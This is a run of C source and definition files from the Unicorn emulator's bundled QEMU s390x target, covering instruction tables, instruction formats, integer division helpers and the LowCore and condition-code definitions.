F(0xe780, VFEE, VRR_b, V, 0, 0, 0, 0, vfee, 0, IF_VEC)
/* VECTOR FIND ELEMENT NOT EQUAL */
F(0xe781, VFENE, VRR_b, V, 0, 0, 0, 0, vfene, 0, IF_VEC)
/* VECTOR ISOLATE STRING */
F(0xe75c, VISTR, VRR_a, V, 0, 0, 0, 0, vistr, 0, IF_VEC)
/* VECTOR STRING RANGE COMPARE */
F(0xe78a, VSTRC, VRR_d, V, 0, 0, 0, 0, vstrc, 0, IF_VEC)

/* === Vector Floating-Point Instructions === */

/* VECTOR FP ADD */
F(0xe7e3, VFA, VRR_c, V, 0, 0, 0, 0, vfa, 0, IF_VEC)
/* VECTOR FP COMPARE SCALAR */
F(0xe7cb, WFC, VRR_a, V, 0, 0, 0, 0, wfc, 0, IF_VEC)
/* VECTOR FP COMPARE AND SIGNAL SCALAR */
F(0xe7ca, WFK, VRR_a, V, 0, 0, 0, 0, wfc, 0, IF_VEC)
/* VECTOR FP COMPARE EQUAL */
F(0xe7e8, VFCE, VRR_c, V, 0, 0, 0, 0, vfc, 0, IF_VEC)
/* VECTOR FP COMPARE HIGH */
F(0xe7eb, VFCH, VRR_c, V, 0, 0, 0, 0, vfc, 0, IF_VEC)
/* VECTOR FP COMPARE HIGH OR EQUAL */
F(0xe7ea, VFCHE, VRR_c, V, 0, 0, 0, 0, vfc, 0, IF_VEC)
/* VECTOR FP CONVERT FROM FIXED 64-BIT */
F(0xe7c3, VCDG, VRR_a, V, 0, 0, 0, 0, vcdg, 0, IF_VEC)
/* VECTOR FP CONVERT FROM LOGICAL 64-BIT */
F(0xe7c1, VCDLG, VRR_a, V, 0, 0, 0, 0, vcdg, 0, IF_VEC)
/* VECTOR FP CONVERT TO FIXED 64-BIT */
F(0xe7c2, VCGD, VRR_a, V, 0, 0, 0, 0, vcdg, 0, IF_VEC)
/* VECTOR FP CONVERT TO LOGICAL 64-BIT */
F(0xe7c0, VCLGD, VRR_a, V, 0, 0, 0, 0, vcdg, 0, IF_VEC)
/* VECTOR FP DIVIDE */
F(0xe7e5, VFD, VRR_c, V, 0, 0, 0, 0, vfa, 0, IF_VEC)
/* VECTOR LOAD FP INTEGER */
F(0xe7c7, VFI, VRR_a, V, 0, 0, 0, 0, vcdg, 0, IF_VEC)
/* VECTOR LOAD LENGTHENED */
F(0xe7c4, VFLL, VRR_a, V, 0, 0, 0, 0, vfll, 0, IF_VEC)
/* VECTOR LOAD ROUNDED */
F(0xe7c5, VFLR, VRR_a, V, 0, 0, 0, 0, vcdg, 0, IF_VEC)
/* VECTOR FP MULTIPLY */
F(0xe7e7, VFM, VRR_c, V, 0, 0, 0, 0, vfa, 0, IF_VEC)
/* VECTOR FP MULTIPLY AND ADD */
F(0xe78f, VFMA, VRR_e, V, 0, 0, 0, 0, vfma, 0, IF_VEC)
/* VECTOR FP MULTIPLY AND SUBTRACT */
F(0xe78e, VFMS, VRR_e, V, 0, 0, 0, 0, vfma, 0, IF_VEC)
/* VECTOR FP PERFORM SIGN OPERATION */
F(0xe7cc, VFPSO, VRR_a, V, 0, 0, 0, 0, vfpso, 0, IF_VEC)
/* VECTOR FP SQUARE ROOT */
F(0xe7ce, VFSQ, VRR_a, V, 0, 0, 0, 0, vfsq, 0, IF_VEC)
/* VECTOR FP SUBTRACT */
F(0xe7e2, VFS, VRR_c, V, 0, 0, 0, 0, vfa, 0, IF_VEC)
/* VECTOR FP TEST DATA CLASS IMMEDIATE */
F(0xe74a, VFTCI, VRI_e, V, 0, 0, 0, 0, vftci, 0, IF_VEC)

#ifndef CONFIG_USER_ONLY
/* COMPARE AND SWAP AND PURGE */
E(0xb250, CSP, RRE, Z, r1_32u, ra2, r1_P, 0, csp, 0, MO_TEUL, IF_PRIV)
E(0xb98a, CSPG, RRE, DAT_ENH, r1_o, ra2, r1_P, 0, csp, 0, MO_TEQ, IF_PRIV)
/* DIAGNOSE (KVM hypercall) */
F(0x8300, DIAG, RSI, Z, 0, 0, 0, 0, diag, 0, IF_PRIV)
/* INSERT STORAGE KEY EXTENDED */
F(0xb229, ISKE, RRE, Z, 0, r2_o, new, r1_8, iske, 0, IF_PRIV)
/* INVALIDATE DAT TABLE ENTRY */
F(0xb98e, IDTE, RRF_b, DAT_ENH, r1_o, r2_o, 0, 0, idte, 0, IF_PRIV)
/* INVALIDATE PAGE TABLE ENTRY */
F(0xb221, IPTE, RRF_a, Z, r1_o, r2_o, 0, 0, ipte, 0, IF_PRIV)
/* LOAD CONTROL */
F(0xb700, LCTL, RS_a, Z, 0, a2, 0, 0, lctl, 0, IF_PRIV)
F(0xeb2f, LCTLG, RSY_a, Z, 0, a2, 0, 0, lctlg, 0, IF_PRIV)
/* LOAD PROGRAM PARAMETER */
F(0xb280, LPP, S, LPP, 0, m2_64, 0, 0, lpp, 0, IF_PRIV)
/* LOAD PSW */
F(0x8200, LPSW, S, Z, 0, a2, 0, 0, lpsw, 0, IF_PRIV)
/* LOAD PSW EXTENDED */
F(0xb2b2, LPSWE, S, Z, 0, a2, 0, 0, lpswe, 0, IF_PRIV)
/* LOAD REAL ADDRESS */
F(0xb100, LRA, RX_a, Z, 0, a2, r1, 0, lra, 0, IF_PRIV)
F(0xe313, LRAY, RXY_a, LD, 0, a2, r1, 0, lra, 0, IF_PRIV)
F(0xe303, LRAG, RXY_a, Z, 0, a2, r1, 0, lra, 0, IF_PRIV)
/* LOAD USING REAL ADDRESS */
E(0xb24b, LURA, RRE, Z, 0, 0, new, r1_32, lura, 0, MO_TEUL, IF_PRIV)
E(0xb905, LURAG, RRE, Z, 0, 0, r1, 0, lura, 0, MO_TEQ, IF_PRIV) /* MOVE TO PRIMARY */ F(0xda00, MVCP, SS_d, Z, la1, a2, 0, 0, mvcp, 0, IF_PRIV) /* MOVE TO SECONDARY */ F(0xdb00, MVCS, SS_d, Z, la1, a2, 0, 0, mvcs, 0, IF_PRIV) /* PURGE TLB */ F(0xb20d, PTLB, S, Z, 0, 0, 0, 0, ptlb, 0, IF_PRIV) /* RESET REFERENCE BIT EXTENDED */ F(0xb22a, RRBE, RRE, Z, 0, r2_o, 0, 0, rrbe, 0, IF_PRIV) /* SERVICE CALL LOGICAL PROCESSOR (PV hypercall) */ F(0xb220, SERVC, RRE, Z, r1_o, r2_o, 0, 0, servc, 0, IF_PRIV) /* SET ADDRESS SPACE CONTROL FAST */ F(0xb279, SACF, S, Z, 0, a2, 0, 0, sacf, 0, IF_PRIV) /* SET CLOCK */ F(0xb204, SCK, S, Z, la2, 0, 0, 0, sck, 0, IF_PRIV) /* SET CLOCK COMPARATOR */ F(0xb206, SCKC, S, Z, 0, m2_64a, 0, 0, sckc, 0, IF_PRIV) /* SET CLOCK PROGRAMMABLE FIELD */ F(0x0107, SCKPF, E, Z, 0, 0, 0, 0, sckpf, 0, IF_PRIV) /* SET CPU TIMER */ F(0xb208, SPT, S, Z, 0, m2_64a, 0, 0, spt, 0, IF_PRIV) /* SET PREFIX */ F(0xb210, SPX, S, Z, 0, m2_32ua, 0, 0, spx, 0, IF_PRIV) /* SET PSW KEY FROM ADDRESS */ F(0xb20a, SPKA, S, Z, 0, a2, 0, 0, spka, 0, IF_PRIV) /* SET STORAGE KEY EXTENDED */ F(0xb22b, SSKE, RRF_c, Z, r1_o, r2_o, 0, 0, sske, 0, IF_PRIV) /* SET SYSTEM MASK */ F(0x8000, SSM, S, Z, 0, m2_8u, 0, 0, ssm, 0, IF_PRIV) /* SIGNAL PROCESSOR */ F(0xae00, SIGP, RS_a, Z, 0, a2, 0, 0, sigp, 0, IF_PRIV) /* STORE CLOCK COMPARATOR */ F(0xb207, STCKC, S, Z, la2, 0, new, m1_64a, stckc, 0, IF_PRIV) /* STORE CONTROL */ F(0xb600, STCTL, RS_a, Z, 0, a2, 0, 0, stctl, 0, IF_PRIV) F(0xeb25, STCTG, RSY_a, Z, 0, a2, 0, 0, stctg, 0, IF_PRIV) /* STORE CPU ADDRESS */ F(0xb212, STAP, S, Z, la2, 0, new, m1_16a, stap, 0, IF_PRIV) /* STORE CPU ID */ F(0xb202, STIDP, S, Z, la2, 0, new, m1_64a, stidp, 0, IF_PRIV) /* STORE CPU TIMER */ F(0xb209, STPT, S, Z, la2, 0, new, m1_64a, stpt, 0, IF_PRIV) /* STORE FACILITY LIST */ F(0xb2b1, STFL, S, Z, 0, 0, 0, 0, stfl, 0, IF_PRIV) /* STORE PREFIX */ F(0xb211, STPX, S, Z, la2, 0, new, m1_32a, stpx, 0, IF_PRIV) /* STORE SYSTEM INFORMATION */ F(0xb27d, STSI, S, Z, 0, a2, 0, 0, stsi, 0, IF_PRIV) /* STORE THEN AND SYSTEM MASK */ F(0xac00, STNSM, SI, Z, la1, 0, 0, 0, stnosm, 0, IF_PRIV) /* STORE THEN OR SYSTEM MASK */ F(0xad00, STOSM, SI, Z, la1, 0, 0, 0, stnosm, 0, IF_PRIV) /* STORE USING REAL ADDRESS */ E(0xb246, STURA, RRE, Z, r1_o, 0, 0, 0, stura, 0, MO_TEUL, IF_PRIV) E(0xb925, STURG, RRE, Z, r1_o, 0, 0, 0, stura, 0, MO_TEQ, IF_PRIV) /* TEST BLOCK */ F(0xb22c, TB, RRE, Z, 0, r2_o, 0, 0, testblock, 0, IF_PRIV) /* TEST PROTECTION */ C(0xe501, TPROT, SSE, Z, la1, a2, 0, 0, tprot, 0) /* CCW I/O Instructions */ F(0xb276, XSCH, S, Z, 0, 0, 0, 0, xsch, 0, IF_PRIV) F(0xb230, CSCH, S, Z, 0, 0, 0, 0, csch, 0, IF_PRIV) F(0xb231, HSCH, S, Z, 0, 0, 0, 0, hsch, 0, IF_PRIV) F(0xb232, MSCH, S, Z, 0, insn, 0, 0, msch, 0, IF_PRIV) F(0xb23b, RCHP, S, Z, 0, 0, 0, 0, rchp, 0, IF_PRIV) F(0xb238, RSCH, S, Z, 0, 0, 0, 0, rsch, 0, IF_PRIV) F(0xb237, SAL, S, Z, 0, 0, 0, 0, sal, 0, IF_PRIV) F(0xb23c, SCHM, S, Z, 0, insn, 0, 0, schm, 0, IF_PRIV) F(0xb274, SIGA, S, Z, 0, 0, 0, 0, siga, 0, IF_PRIV) F(0xb23a, STCPS, S, Z, 0, 0, 0, 0, stcps, 0, IF_PRIV) F(0xb233, SSCH, S, Z, 0, insn, 0, 0, ssch, 0, IF_PRIV) F(0xb239, STCRW, S, Z, 0, insn, 0, 0, stcrw, 0, IF_PRIV) F(0xb234, STSCH, S, Z, 0, insn, 0, 0, stsch, 0, IF_PRIV) F(0xb236, TPI , S, Z, la2, 0, 0, 0, tpi, 0, IF_PRIV) F(0xb235, TSCH, S, Z, 0, insn, 0, 0, tsch, 0, IF_PRIV) /* ??? Not listed in PoO ninth edition, but there's a linux driver that uses it: "A CHSC subchannel is usually present on LPAR only." 
*/
F(0xb25f, CHSC, RRE, Z, 0, insn, 0, 0, chsc, 0, IF_PRIV)

/* zPCI Instructions */
/* None of these instructions are documented in the PoP, so this is all
   based upon target/s390x/kvm.c and Linux code and likely incomplete */
F(0xebd0, PCISTB, RSY_a, PCI, la2, 0, 0, 0, pcistb, 0, IF_PRIV)
F(0xebd1, SIC, RSY_a, AIS, r1, r3, 0, 0, sic, 0, IF_PRIV)
F(0xb9a0, CLP, RRF_c, PCI, 0, 0, 0, 0, clp, 0, IF_PRIV)
F(0xb9d0, PCISTG, RRE, PCI, 0, 0, 0, 0, pcistg, 0, IF_PRIV)
F(0xb9d2, PCILG, RRE, PCI, 0, 0, 0, 0, pcilg, 0, IF_PRIV)
F(0xb9d3, RPCIT, RRE, PCI, 0, 0, 0, 0, rpcit, 0, IF_PRIV)
F(0xe3d0, MPCIFC, RXY_a, PCI, la2, 0, 0, 0, mpcifc, 0, IF_PRIV)
F(0xe3d4, STPCIFC, RXY_a, PCI, la2, 0, 0, 0, stpcifc, 0, IF_PRIV)
#endif /* CONFIG_USER_ONLY */

unicorn-2.1.1/qemu/target/s390x/insn-format.def

/* Description of s390 insn formats. */
/* NAME F1, F2... */
F0(E)
F1(I, I(1, 8, 8))
F2(RI_a, R(1, 8), I(2,16,16))
F2(RI_b, R(1, 8), I(2,16,16))
F2(RI_c, M(1, 8), I(2,16,16))
F3(RIE_a, R(1, 8), I(2,16,16), M(3,32))
F4(RIE_b, R(1, 8), R(2,12), M(3,32), I(4,16,16))
F4(RIE_c, R(1, 8), I(2,32, 8), M(3,12), I(4,16,16))
F3(RIE_d, R(1, 8), I(2,16,16), R(3,12))
F3(RIE_e, R(1, 8), I(2,16,16), R(3,12))
F5(RIE_f, R(1, 8), R(2,12), I(3,16,8), I(4,24,8), I(5,32,8))
F3(RIE_g, R(1, 8), I(2,16,16), M(3,12))
F2(RIL_a, R(1, 8), I(2,16,32))
F2(RIL_b, R(1, 8), I(2,16,32))
F2(RIL_c, M(1, 8), I(2,16,32))
F4(RIS, R(1, 8), I(2,32, 8), M(3,12), BD(4,16,20))
/* ??? The PoO does not call out subtypes _a and _b for RR, as it does
   for e.g. RX. Our checking requires this for e.g. BCR. */
F2(RR_a, R(1, 8), R(2,12))
F2(RR_b, M(1, 8), R(2,12))
F2(RRE, R(1,24), R(2,28))
F3(RRD, R(1,16), R(2,28), R(3,24))
F4(RRF_a, R(1,24), R(2,28), R(3,16), M(4,20))
F4(RRF_b, R(1,24), R(2,28), R(3,16), M(4,20))
F4(RRF_c, R(1,24), R(2,28), M(3,16), M(4,20))
F4(RRF_d, R(1,24), R(2,28), M(3,16), M(4,20))
F4(RRF_e, R(1,24), R(2,28), M(3,16), M(4,20))
F4(RRS, R(1, 8), R(2,12), M(3,32), BD(4,16,20))
F3(RS_a, R(1, 8), BD(2,16,20), R(3,12))
F3(RS_b, R(1, 8), BD(2,16,20), M(3,12))
F3(RSI, R(1, 8), I(2,16,16), R(3,12))
F2(RSL, L(1, 8, 4), BD(1,16,20))
F3(RSY_a, R(1, 8), BDL(2), R(3,12))
F3(RSY_b, R(1, 8), BDL(2), M(3,12))
F2(RX_a, R(1, 8), BXD(2))
F2(RX_b, M(1, 8), BXD(2))
F3(RXE, R(1, 8), BXD(2), M(3,32))
F3(RXF, R(1,32), BXD(2), R(3, 8))
F2(RXY_a, R(1, 8), BXDL(2))
F2(RXY_b, M(1, 8), BXDL(2))
F1(S, BD(2,16,20))
F2(SI, BD(1,16,20), I(2,8,8))
F2(SIL, BD(1,16,20), I(2,32,16))
F2(SIY, BDL(1), I(2, 8, 8))
F3(SS_a, L(1, 8, 8), BD(1,16,20), BD(2,32,36))
F4(SS_b, L(1, 8, 4), BD(1,16,20), L(2,12,4), BD(2,32,36))
F4(SS_c, L(1, 8, 4), BD(1,16,20), BD(2,32,36), I(3,12, 4))
/* ??? Odd man out. The L1 field here is really a register, but the
   easy way to compress the fields has R1 and B1 overlap.
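   In MVCP and MVCS (the users of SS_d below) the L1 position holds a
   register number, R1, whose contents give the operand length, rather
   than an immediate length field.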
*/
F4(SS_d, L(1, 8, 4), BD(1,16,20), BD(2,32,36), R(3,12))
F4(SS_e, R(1, 8), BD(2,16,20), R(3,12), BD(4,32,36))
F3(SS_f, BD(1,16,20), L(2,8,8), BD(2,32,36))
F2(SSE, BD(1,16,20), BD(2,32,36))
F3(SSF, BD(1,16,20), BD(2,32,36), R(3,8))
F3(VRI_a, V(1,8), I(2,16,16), M(3,32))
F4(VRI_b, V(1,8), I(2,16,8), I(3,24,8), M(4,32))
F4(VRI_c, V(1,8), V(3,12), I(2,16,16), M(4,32))
F5(VRI_d, V(1,8), V(2,12), V(3,16), I(4,24,8), M(5,32))
F5(VRI_e, V(1,8), V(2,12), I(3,16,12), M(5,28), M(4,32))
F5(VRI_f, V(1,8), V(2,12), V(3,16), M(5,24), I(4,28,8))
F5(VRI_g, V(1,8), V(2,12), I(4,16,8), M(5,24), I(3,28,8))
F3(VRI_h, V(1,8), I(2,16,16), I(3,32,4))
F4(VRI_i, V(1,8), R(2,12), M(4,24), I(3,28,8))
F5(VRR_a, V(1,8), V(2,12), M(5,24), M(4,28), M(3,32))
F5(VRR_b, V(1,8), V(2,12), V(3,16), M(5,24), M(4,32))
F6(VRR_c, V(1,8), V(2,12), V(3,16), M(6,24), M(5,28), M(4,32))
F6(VRR_d, V(1,8), V(2,12), V(3,16), M(5,20), M(6,24), V(4,32))
F6(VRR_e, V(1,8), V(2,12), V(3,16), M(6,20), M(5,28), V(4,32))
F3(VRR_f, V(1,8), R(2,12), R(3,16))
F1(VRR_g, V(1,12))
F3(VRR_h, V(1,12), V(2,16), M(3,24))
F3(VRR_i, R(1,8), V(2,12), M(3,24))
F4(VRS_a, V(1,8), V(3,12), BD(2,16,20), M(4,32))
F4(VRS_b, V(1,8), R(3,12), BD(2,16,20), M(4,32))
F4(VRS_c, R(1,8), V(3,12), BD(2,16,20), M(4,32))
F3(VRS_d, R(3,12), BD(2,16,20), V(1,32))
F4(VRV, V(1,8), V(2,12), BD(2,16,20), M(3,32))
F3(VRX, V(1,8), BXD(2), M(3,32))
F3(VSI, I(3,8,8), BD(2,16,20), V(1,32))

unicorn-2.1.1/qemu/target/s390x/int_helper.c

/*
 * S/390 integer helper routines
 *
 * Copyright (c) 2009 Ulrich Hecht
 * Copyright (c) 2009 Alexander Graf
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "internal.h"
#include "tcg_s390x.h"
#include "exec/exec-all.h"
#include "qemu/host-utils.h"
#include "exec/helper-proto.h"

/* #define DEBUG_HELPER */
#ifdef DEBUG_HELPER
#define HELPER_LOG(x, ...) qemu_log(x)
#else
#define HELPER_LOG(x, ...)
#endif

/* 64/32 -> 32 signed division */
int64_t HELPER(divs32)(CPUS390XState *env, int64_t a, int64_t b64)
{
    int32_t ret, b = b64;
    int64_t q;

    if (b == 0) {
        tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC());
    }

    ret = q = a / b;
    env->retxl = a % b;

    /* Catch non-representable quotient.
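       For example, a = 0x100000000 and b = 2 give q = 0x80000000, which
       no longer fits in a signed 32-bit result: the truncated ret compares
       unequal to q and a fixed-point-divide exception is raised.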
*/
    if (ret != q) {
        tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC());
    }
    return ret;
}

/* 64/32 -> 32 unsigned division */
uint64_t HELPER(divu32)(CPUS390XState *env, uint64_t a, uint64_t b64)
{
    uint32_t ret, b = b64;
    uint64_t q;

    if (b == 0) {
        tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC());
    }

    ret = q = a / b;
    env->retxl = a % b;

    /* Catch non-representable quotient. */
    if (ret != q) {
        tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC());
    }

    return ret;
}

/* 64/64 -> 64 signed division */
int64_t HELPER(divs64)(CPUS390XState *env, int64_t a, int64_t b)
{
    /* Catch divide by zero, and non-representable quotient (MIN / -1). */
    if (b == 0 || (b == -1 && a == (1ll << 63))) {
        tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC());
    }
    env->retxl = a % b;
    return a / b;
}

/* 128 -> 64/64 unsigned division */
uint64_t HELPER(divu64)(CPUS390XState *env, uint64_t ah, uint64_t al,
                        uint64_t b)
{
    uint64_t ret;
    /* Signal divide by zero. */
    if (b == 0) {
        tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC());
    }
    if (ah == 0) {
        /* 64 -> 64/64 case */
        env->retxl = al % b;
        ret = al / b;
    } else {
        /* ??? Move i386 idivq helper to host-utils. */
#ifdef CONFIG_INT128
        __uint128_t a = ((__uint128_t)ah << 64) | al;
        __uint128_t q = a / b;
        env->retxl = a % b;
        ret = q;
        if (ret != q) {
            tcg_s390_program_interrupt(env, PGM_FIXPT_DIVIDE, GETPC());
        }
#else
        /* 32-bit hosts would need special wrapper functionality - just abort
           if we encounter such a case; it's very unlikely anyways. */
        cpu_abort(env_cpu(env), "128 -> 64/64 division not implemented\n");
#endif
    }
    return ret;
}

uint64_t HELPER(cvd)(int32_t reg)
{
    /* positive 0 */
    uint64_t dec = 0x0c;
    int64_t bin = reg;
    int shift;

    if (bin < 0) {
        bin = -bin;
        dec = 0x0d;
    }

    for (shift = 4; (shift < 64) && bin; shift += 4) {
        dec |= (bin % 10) << shift;
        bin /= 10;
    }

    return dec;
}

uint64_t HELPER(popcnt)(uint64_t val)
{
    /* Note that we don't fold past bytes. */
    val = (val & 0x5555555555555555ULL) + ((val >> 1) & 0x5555555555555555ULL);
    val = (val & 0x3333333333333333ULL) + ((val >> 2) & 0x3333333333333333ULL);
    val = (val + (val >> 4)) & 0x0f0f0f0f0f0f0f0fULL;
    return val;
}

unicorn-2.1.1/qemu/target/s390x/internal.h

/*
 * s390x internal definitions and helpers
 *
 * Copyright (c) 2009 Ulrich Hecht
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
*/ #ifndef S390X_INTERNAL_H #define S390X_INTERNAL_H #include "cpu.h" #ifndef CONFIG_USER_ONLY QEMU_PACK(typedef struct LowCore { /* prefix area: defined by architecture */ uint32_t ccw1[2]; /* 0x000 */ uint32_t ccw2[4]; /* 0x008 */ uint8_t pad1[0x80 - 0x18]; /* 0x018 */ uint32_t ext_params; /* 0x080 */ uint16_t cpu_addr; /* 0x084 */ uint16_t ext_int_code; /* 0x086 */ uint16_t svc_ilen; /* 0x088 */ uint16_t svc_code; /* 0x08a */ uint16_t pgm_ilen; /* 0x08c */ uint16_t pgm_code; /* 0x08e */ uint32_t data_exc_code; /* 0x090 */ uint16_t mon_class_num; /* 0x094 */ uint16_t per_perc_atmid; /* 0x096 */ uint64_t per_address; /* 0x098 */ uint8_t exc_access_id; /* 0x0a0 */ uint8_t per_access_id; /* 0x0a1 */ uint8_t op_access_id; /* 0x0a2 */ uint8_t ar_access_id; /* 0x0a3 */ uint8_t pad2[0xA8 - 0xA4]; /* 0x0a4 */ uint64_t trans_exc_code; /* 0x0a8 */ uint64_t monitor_code; /* 0x0b0 */ uint16_t subchannel_id; /* 0x0b8 */ uint16_t subchannel_nr; /* 0x0ba */ uint32_t io_int_parm; /* 0x0bc */ uint32_t io_int_word; /* 0x0c0 */ uint8_t pad3[0xc8 - 0xc4]; /* 0x0c4 */ uint32_t stfl_fac_list; /* 0x0c8 */ uint8_t pad4[0xe8 - 0xcc]; /* 0x0cc */ uint64_t mcic; /* 0x0e8 */ uint8_t pad5[0xf4 - 0xf0]; /* 0x0f0 */ uint32_t external_damage_code; /* 0x0f4 */ uint64_t failing_storage_address; /* 0x0f8 */ uint8_t pad6[0x110 - 0x100]; /* 0x100 */ uint64_t per_breaking_event_addr; /* 0x110 */ uint8_t pad7[0x120 - 0x118]; /* 0x118 */ PSW restart_old_psw; /* 0x120 */ PSW external_old_psw; /* 0x130 */ PSW svc_old_psw; /* 0x140 */ PSW program_old_psw; /* 0x150 */ PSW mcck_old_psw; /* 0x160 */ PSW io_old_psw; /* 0x170 */ uint8_t pad8[0x1a0 - 0x180]; /* 0x180 */ PSW restart_new_psw; /* 0x1a0 */ PSW external_new_psw; /* 0x1b0 */ PSW svc_new_psw; /* 0x1c0 */ PSW program_new_psw; /* 0x1d0 */ PSW mcck_new_psw; /* 0x1e0 */ PSW io_new_psw; /* 0x1f0 */ uint8_t pad13[0x11b0 - 0x200]; /* 0x200 */ uint64_t mcesad; /* 0x11B0 */ /* 64 bit extparam used for pfault, diag 250 etc */ uint64_t ext_params2; /* 0x11B8 */ uint8_t pad14[0x1200 - 0x11C0]; /* 0x11C0 */ /* System info area */ uint64_t floating_pt_save_area[16]; /* 0x1200 */ uint64_t gpregs_save_area[16]; /* 0x1280 */ uint32_t st_status_fixed_logout[4]; /* 0x1300 */ uint8_t pad15[0x1318 - 0x1310]; /* 0x1310 */ uint32_t prefixreg_save_area; /* 0x1318 */ uint32_t fpt_creg_save_area; /* 0x131c */ uint8_t pad16[0x1324 - 0x1320]; /* 0x1320 */ uint32_t tod_progreg_save_area; /* 0x1324 */ uint64_t cpu_timer_save_area; /* 0x1328 */ uint64_t clock_comp_save_area; /* 0x1330 */ uint8_t pad17[0x1340 - 0x1338]; /* 0x1338 */ uint32_t access_regs_save_area[16]; /* 0x1340 */ uint64_t cregs_save_area[16]; /* 0x1380 */ /* align to the top of the prefix area */ uint8_t pad18[0x2000 - 0x1400]; /* 0x1400 */ }) LowCore; QEMU_BUILD_BUG_ON(sizeof(LowCore) != 8192); #endif /* CONFIG_USER_ONLY */ #define MAX_ILEN 6 /* While the PoO talks about ILC (a number between 1-3) what is actually stored in LowCore is shifted left one bit (an even between 2-6). As this is the actual length of the insn and therefore more useful, that is what we want to pass around and manipulate. To make sure that we have applied this distinction universally, rename the "ILC" to "ILEN". */ static inline int get_ilen(uint8_t opc) { switch (opc >> 6) { case 0: return 2; case 1: case 2: return 4; default: return 6; } } /* Compute the ATMID field that is stored in the per_perc_atmid lowcore entry when a PER exception is triggered. */ static inline uint8_t get_per_atmid(CPUS390XState *env) { return ((env->psw.mask & PSW_MASK_64) ? 
(1 << 7) : 0) |
           (1 << 6) |
           ((env->psw.mask & PSW_MASK_32) ? (1 << 5) : 0) |
           ((env->psw.mask & PSW_MASK_DAT) ? (1 << 4) : 0) |
           ((env->psw.mask & PSW_ASC_SECONDARY) ? (1 << 3) : 0) |
           ((env->psw.mask & PSW_ASC_ACCREG) ? (1 << 2) : 0);
}

static inline uint64_t wrap_address(CPUS390XState *env, uint64_t a)
{
    if (!(env->psw.mask & PSW_MASK_64)) {
        if (!(env->psw.mask & PSW_MASK_32)) {
            /* 24-Bit mode */
            a &= 0x00ffffff;
        } else {
            /* 31-Bit mode */
            a &= 0x7fffffff;
        }
    }
    return a;
}

/* CC optimization */

/* Instead of computing the condition codes after each s390x instruction,
 * QEMU just stores the result (called CC_DST), the type of operation
 * (called CC_OP) and whatever operands are needed (CC_SRC and possibly
 * CC_VR). When the condition codes are needed, the condition codes can
 * be calculated using this information. Condition codes are not generated
 * if they are only needed for conditional branches.
 */
enum cc_op {
    CC_OP_CONST0 = 0,           /* CC is 0 */
    CC_OP_CONST1,               /* CC is 1 */
    CC_OP_CONST2,               /* CC is 2 */
    CC_OP_CONST3,               /* CC is 3 */

    CC_OP_DYNAMIC,              /* CC calculation defined by env->cc_op */
    CC_OP_STATIC,               /* CC value is env->cc_op */

    CC_OP_NZ,                   /* env->cc_dst != 0 */
    CC_OP_LTGT_32,              /* signed less/greater than (32bit) */
    CC_OP_LTGT_64,              /* signed less/greater than (64bit) */
    CC_OP_LTUGTU_32,            /* unsigned less/greater than (32bit) */
    CC_OP_LTUGTU_64,            /* unsigned less/greater than (64bit) */
    CC_OP_LTGT0_32,             /* signed less/greater than 0 (32bit) */
    CC_OP_LTGT0_64,             /* signed less/greater than 0 (64bit) */

    CC_OP_ADD_64,               /* overflow on add (64bit) */
    CC_OP_ADDU_64,              /* overflow on unsigned add (64bit) */
    CC_OP_ADDC_64,              /* overflow on unsigned add-carry (64bit) */
    CC_OP_SUB_64,               /* overflow on subtraction (64bit) */
    CC_OP_SUBU_64,              /* overflow on unsigned subtraction (64bit) */
    CC_OP_SUBB_64,              /* overflow on unsigned sub-borrow (64bit) */
    CC_OP_ABS_64,               /* sign eval on abs (64bit) */
    CC_OP_NABS_64,              /* sign eval on nabs (64bit) */

    CC_OP_ADD_32,               /* overflow on add (32bit) */
    CC_OP_ADDU_32,              /* overflow on unsigned add (32bit) */
    CC_OP_ADDC_32,              /* overflow on unsigned add-carry (32bit) */
    CC_OP_SUB_32,               /* overflow on subtraction (32bit) */
    CC_OP_SUBU_32,              /* overflow on unsigned subtraction (32bit) */
    CC_OP_SUBB_32,              /* overflow on unsigned sub-borrow (32bit) */
    CC_OP_ABS_32,               /* sign eval on abs (32bit) */
    CC_OP_NABS_32,              /* sign eval on nabs (32bit) */

    CC_OP_COMP_32,              /* complement */
    CC_OP_COMP_64,              /* complement */

    CC_OP_TM_32,                /* test under mask (32bit) */
    CC_OP_TM_64,                /* test under mask (64bit) */

    CC_OP_NZ_F32,               /* FP dst != 0 (32bit) */
    CC_OP_NZ_F64,               /* FP dst != 0 (64bit) */
    CC_OP_NZ_F128,              /* FP dst != 0 (128bit) */

    CC_OP_ICM,                  /* insert characters under mask */
    CC_OP_SLA,                  /* Calculate shift left signed */
    CC_OP_FLOGR,                /* find leftmost one */
    CC_OP_LCBB,                 /* load count to block boundary */
    CC_OP_VC,                   /* vector compare result */
    CC_OP_MAX
};

static inline hwaddr decode_basedisp_s(CPUS390XState *env, uint32_t ipb,
                                       uint8_t *ar)
{
    hwaddr addr = 0;
    uint8_t reg;

    reg = ipb >> 28;
    if (reg > 0) {
        addr = env->regs[reg];
    }
    addr += (ipb >> 16) & 0xfff;
    if (ar) {
        *ar = reg;
    }

    return addr;
}

/* Base/displacement are at the same locations.
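   As an illustration, an IPB whose upper halfword is 0x3008 decodes to
   env->regs[3] + 0x008 (base register 3, 12-bit displacement 8), and
   decode_basedisp_rs below reuses exactly this extraction for RS-format
   instructions.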
